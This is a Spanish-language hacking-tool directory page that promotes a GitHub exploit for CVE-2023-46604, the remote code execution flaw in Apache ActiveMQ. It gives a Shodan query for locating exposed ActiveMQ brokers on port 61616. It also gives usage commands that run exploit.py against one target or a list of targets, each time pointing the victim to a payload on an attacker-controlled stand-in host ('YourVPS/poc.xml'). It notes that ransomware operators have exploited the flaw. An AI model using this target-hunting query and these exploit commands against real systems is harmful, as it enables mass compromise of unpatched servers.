Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-46604 — Exploit para CVE-2023-46604 | Kitploit
Herramientas/GitHubGitHub/mrpentst/cve-2023-46604
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónComando y ControlHerramienta de Acceso Remoto
GitHubmrpentst/cve-2023-46604

CVE-2023-46604

Exploit para CVE-2023-46604

Ver Repositorio
22hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-46604

Exploit para CVE-2023-46604

Esta herramienta ayuda a explotar esta vulnerabilidad.

Consulta de Shodan para encontrar el objetivo:

root@kitploit:~
product:"ActiveMQ" port:"61616"

Uso de la herramienta:

root@kitploit:~
for read targets from the file:
python3 exploit.py -f targets -c http://YourVPS/poc.xml
---
single target:
python3 exploit.py -ip IP -c http://YourVPS/poc.xml

Acerca de este CVE:

CVE-2023-46604 es una vulnerabilidad crítica de ejecución remota de código en Apache ActiveMQ, un software de broker de mensajes de código abierto. Esta vulnerabilidad permite que un atacante remoto con acceso a la red, ya sea a un broker o cliente OpenWire basado en Java, ejecute comandos arbitrarios de shell. Esto se logra manipulando los tipos de clases serializadas en el protocolo OpenWire, lo que provoca que el broker instancie cualquier clase en el classpath. La vulnerabilidad se debe a una deserialización insegura en Apache ActiveMQ y ha sido explotada por atacantes, incluida la familia de ransomware HelloKitty, para ejecutar binarios de ransomware y comprometer completamente los sistemas.

Descargar herramienta